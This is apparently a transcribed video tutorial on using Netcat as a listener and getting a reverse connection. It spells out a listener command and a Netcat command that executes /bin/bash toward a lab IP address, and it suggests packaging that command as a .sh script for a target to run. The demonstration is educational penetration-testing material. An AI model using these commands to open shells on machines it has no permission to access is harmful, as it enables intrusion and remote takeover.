Hello everyone, welcome back to the next video of the Netcat series. So as in the previous video I have told you about the Netcat and Netcat banner grabbing. So how can you know this what type of service is running in that port? So today in this video I am going to tell you about how can you get any type of reversal connection using Netcat, and what are the commands to be used to listen to that any connection to or to what are the commands you should use to use Netcat as a listener. Basically, in the previous video, if you have watched, I have used Netcat in some cases, and also show you about MSF console, because yeah, you can use MSF console as a listener also. So in this video I will tell you how can you use Netcat as a listener. So first I will tell you about this what type of script you should send to the computer and what type of listener you should use. So at first if you want to do any type of penetration testing, or if you want to get any type of reverse connection from any type of from any computer, you should start a listener to your computer first. So what are the steps to start a listener using the Netcat? First you will write Netcat, then hyphen lnvp. So what is the full command? L for listening, N for number of numeric IP address, no DNS, V for verbose, and P for port. So I have written the whole command in one line, and then what will I do? I will mention the port, which port I am going to open. Suppose I am going to open the port 4044. So in my computer I am opening 4044 port. So I mention one thing. So yeah, so using the listener service, yeah, whether you are using Netcat or you are using MSF console or you are using Telnet, it depends on you. So any type of tool you are using, and you can open any port you want, and not the renowned port like 80, which 80 which runs HTTP only service, and 443 what is HTTPS as a service. So don't run the renowned port like 22 which runs as SSH as a service. Don't open that port on your computer, because it will not open, and if it gets open you will not get the connection over there. It will get hampered. So open the port which are not renowned, like 4444, 4044, 8080, like that, 666. The ports which so there are 65,535 ports from 1 to 6 from 1. So you can open any port which are not renowned. So there are lots of ports available you want to choose. So at first you have to use the listener ncat-lnvp 4044, and then in the target computer you have to say the payload. Suppose this is I'm using the Kali Linux as the target computer, because it will be helpful for you and it will give a first result. Suppose this tab is your computer. So from the computer which will you hack, so I'm using the Netcat service in this computer, and this tab is the target computer. Means suppose you want to target a person named A, or a person someone. So what will you do over there? You have to send one Netcat script. So how a Netcat script or any type of backdoor, I'm just telling how Netcat work. So the script on Netcat is netcat hyphen nv, then hyphen e for execute. Then what do I want to do? I want to simply wants a bin bash connection, and then what will I mention? 192.168.8.135. Why did I mention this IP address? Because you have to mention the IP address from which the Kali Linux is running. And if you see the IP address of the Kali Linux, if config, you can see that my IP address is 192.168.8.135. So you have to run the IP address of the Kali Linux only, not any other IP address. So because I am listening on the Kali Linux only, I will give the Kali Linux IP address only. Consider this screen as a target screen. Okay, not your screen. I am just using two tabs. And then you have to mention the port. If you mention different port, it will not work. So you have to mention the same port which you have opened for the listening connection. You write 4044, and and in this case I will press enter, and the reverse connection will go back to this terminal. But in the real case, what will you do? You can use this script as a .sh file. So you know the Linux works at .sh file. So you can write this script in any kind of text editor, and you can save the text editor into .sh file. But this is not the real case of ethical hacking, because the target will not work this script, not run this script in his computer, or you or the target may can watch the script. So I'm just telling, so how can you execute the, or how can you get the reverse connection? So netcat hyphen nv hyphen e bin bash, and then if you press enter, or that, or if that, or say the target execute this script, what will happen? Open, and you see it got connected to 192.168 from 4 and 1. So, and if you do basic id, you can see it is a root, because my Kali Linux is root from the previously only, so you are getting the root, otherwise you are not getting the root. So if you do bash hyphen I, you may or bin bash or sh id, or you can see the root access is like that. So I just told how can you get the reverse connection of the target computer. Rest of the thing is up to you. How will you send this script? Don't send this script anyone, or to anyone which you don't have any permission. So this is for the education purpose only. So this type of script is used for, see here I written bin bash and you have gone. So so if the target execute this script, so what is happening, it is telling the netcat execute this, execute netcat hyphen n for numeric v and hyphen e for execute a bin bash at ip 192.168.8.135, which is this, and which is running a listener connect to this port. So and the netcat is what is doing, and the netcat is listening into this port. So the connection from this ip and is going to this port only, and here I am starting a listener as well as verbose as well as port, and we got a reverse connection over here. So in this way netcat works in a real life scenario, and this is very much helpful in the penetration testing also. So because netcat is a command line interface tool, and it doesn't require any type of GUI, and it is very easy to use. So I hope you have got a clear idea about netcat. So thank you for watching the video.